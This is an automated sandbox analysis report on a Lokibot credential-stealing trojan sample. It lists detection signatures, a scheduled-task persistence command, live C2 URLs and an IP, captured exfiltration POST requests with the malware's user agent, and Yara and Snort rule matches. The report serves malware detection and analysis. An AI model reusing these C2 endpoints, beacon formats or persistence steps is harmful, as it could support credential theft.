
Windows Analysis Report 2CW1YLhNIS

Overview

General Information

Sample Name: 2CW1YLhNIS (renamed file extension from none to exe)
Analysis ID: 438541
MD5: 76afce42f708e6a32dc9d0e52f9f0336
SHA1: d7a3d05c161bcfdafe6348d82672d011fc5b05cc
SHA256: 9e658eb8027169730ef306e2e3b145dd71c9d9f569ce7dd7c8264a0dfc114d87
Tags: 32 exe Loki trojan

Most interesting Screenshot: (image not included in this extract)

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2CW1YLhNIS.exe (PID: 5768 cmdline: 'C:\Users\user\Desktop\2CW1YLhNIS.exe' MD5: 76AFCE42F708E6A32DC9D0E52F9F0336)
    • schtasks.exe (PID: 2872 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 2CW1YLhNIS.exe (PID: 6172 cmdline: C:\Users\user\Desktop\2CW1YLhNIS.exe MD5: 76AFCE42F708E6A32DC9D0E52F9F0336)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/QQojJUjm8ByeT"]}

Yara Overview

Memory Dumps

Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Rule: JoeSecurity_AntiVM_3 | Description: Yara detected AntiVM_3 | Author: Joe Security
Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Rule: JoeSecurity_aPLib_compressed_binary | Description: Yara detected aPLib compressed binary | Author: Joe Security
Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Rule: JoeSecurity_Lokibot | Description: Yara detected Lokibot | Author: Joe Security
Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Rule: Lokibot | Description: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group | Strings:
  • 0x1727b:$des3: 68 03 66 00 00
  • 0x1b678:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x1b744:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Unpacked PEs

Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack | Rule: SUSP_XORed_URL_in_EXE | Description: Detects an XORed URL in an executable | Author: Florian Roth | Strings:
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack | Rule: JoeSecurity_aPLib_compressed_binary | Description: Yara detected aPLib compressed binary | Author: Joe Security
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack | Rule: JoeSecurity_Lokibot | Description: Yara detected Lokibot | Author: Joe Security
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack | Rule: Loki_1 | Description: Loki Payload | Author: kevoreilly | Strings:
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 2CW1YLhNIS.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\UieOsrSocP.exe | Avira: detection malicious, Label: HEUR/AGEN.1142734
Found malware configuration
Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/QQojJUjm8ByeT"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\UieOsrSocP.exe | ReversingLabs: Detection: 26%
Multi AV Scanner detection for submitted file
Source: 2CW1YLhNIS.exe | ReversingLabs: Detection: 26%
Source: 2CW1YLhNIS.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 2CW1YLhNIS.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_05FAC8A8
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_05FAC898

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49735 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49735 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49735 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49735 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49737 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49737 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49737 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49737 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49739 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49739 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49739 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49739 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49741 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49741 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49741 -> 63.141.228.141:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor | URLs: http://63.141.228.141/32.php/QQojJUjm8ByeT
Source: Joe Sandbox View | IP Address: 63.141.228.141
Source: Joe Sandbox View | ASN Name: NOCIXUS
Source: global traffic | HTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: C18574AA | Content-Length: 190 | Connection: close
Source: global traffic | HTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: C18574AA | Content-Length: 190 | Connection: close
Source: global traffic | HTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: C18574AA | Content-Length: 163 | Connection: close
Source: global traffic | HTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: C18574AA | Content-Length: 163 | Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 63.141.228.141 (38 occurrences)
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4_2_00404ED4 recv
Source: unknown | HTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: C18574AA | Content-Length: 190 | Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Jun 2021 16:23:10 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 
20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
Source: 2CW1YLhNIS.exe, 00000004.00000002.660280673.000000000049F000.00000040.00000001.sdmp | String found in binary or memory: http://63.141.228.141/32.php/QQojJUjm8ByeT
Source: 2CW1YLhNIS.exe, 00000000.00000002.649270975.0000000002D11000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 2CW1YLhNIS.exe, 2CW1YLhNIS.exe, 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: 2CW1YLhNIS.exe, 00000000.00000002.648771695.0000000001100000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload, Author: kevoreilly
Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPE | Matched rule: Loki Payload, Author: kevoreilly
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code functions (process 0): 0_2_008F5EC6, 0_2_008F21B8, 0_2_008F4B40, 0_2_02B7F640, 0_2_02B7F952, 0_2_02B7F6E1, 0_2_02B79890, 0_2_0534ED2E, 0_2_053468A4, 0_2_0534E8F0, 0_2_0534A210, 0_2_0534E8E0, 0_2_05FAD4E0, 0_2_05FAA4B5, 0_2_05FAA450, 0_2_05FA8608, 0_2_05FA93C0, 0_2_05FAA238, 0_2_05FA8D20, 0_2_05FA1E10, 0_2_05FABA91, 0_2_05FA85F8, 0_2_05FA0570, 0_2_05FA0561, 0_2_05FA17B8, 0_2_05FA17A8, 0_2_05FA9750, 0_2_05FA9740, 0_2_05FA4668, 0_2_05FA465A, 0_2_05FA4180, 0_2_05FA4172, 0_2_05FA93B1, 0_2_05FA32A8, 0_2_05FA326D, 0_2_05FA3237, 0_2_05FAA228, 0_2_05FA8D0F, 0_2_05FA1C30, 0_2_05FA1C20, 0_2_05FA9E60, 0_2_05FA9E51, 0_2_05FA1E01, 0_2_05FA19D8, 0_2_05FA19C8, 0_2_05FA38E0, 0_2_05FA3898
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code functions (process 4): 4_2_0040549C, 4_2_004029D4, 4_2_00C921B8, 4_2_00C95EC6, 4_2_00C94B40
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: String function: 00405B6F appears 42 times
Source: 2CW1YLhNIS.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UieOsrSocP.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2CW1YLhNIS.exe, 00000000.00000002.648771695.0000000001100000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 2CW1YLhNIS.exe
Source: 2CW1YLhNIS.exe, 00000000.00000002.655077709.000000000BE80000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs 2CW1YLhNIS.exe
Source: 2CW1YLhNIS.exe, 00000000.00000002.648342673.0000000000A0C000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSearchData.exe< vs 2CW1YLhNIS.exe
Source: 2CW1YLhNIS.exe, 00000000.00000002.649406564.0000000002DEF000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRelativeFileUrl.dllL vs 2CW1YLhNIS.exe
Source: 2CW1YLhNIS.exe, 00000000.00000002.654647019.00000000061C0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSparselyPopulated.dll@ vs 2CW1YLhNIS.exe
Source: 2CW1YLhNIS.exe, 00000000.00000002.655249744.000000000BF80000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs 2CW1YLhNIS.exe
Source: 2CW1YLhNIS.exe, 00000000.00000002.655249744.000000000BF80000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2CW1YLhNIS.exe
Source: 2CW1YLhNIS.exe, 00000004.00000000.647583868.0000000000DAC000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSearchData.exe< vs 2CW1YLhNIS.exe
Source: 2CW1YLhNIS.exe | Binary or memory string: OriginalFilenameSearchData.exe< vs 2CW1YLhNIS.exe
Source: 2CW1YLhNIS.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/6@0/1
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 4_2_0040650A
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 4_2_0040434D
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File created: C:\Users\user\AppData\Roaming\UieOsrSocP.exe
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Mutant created: \Sessions\1\BaseNamedObjects\pkPskRKRiL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_01
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File created: C:\Users\user\AppData\Local\Temp\tmp9D57.tmp
                Source: 2CW1YLhNIS.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                Source: 2CW1YLhNIS.exe | ReversingLabs: Detection: 26%
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File read: C:\Users\user\Desktop\2CW1YLhNIS.exe
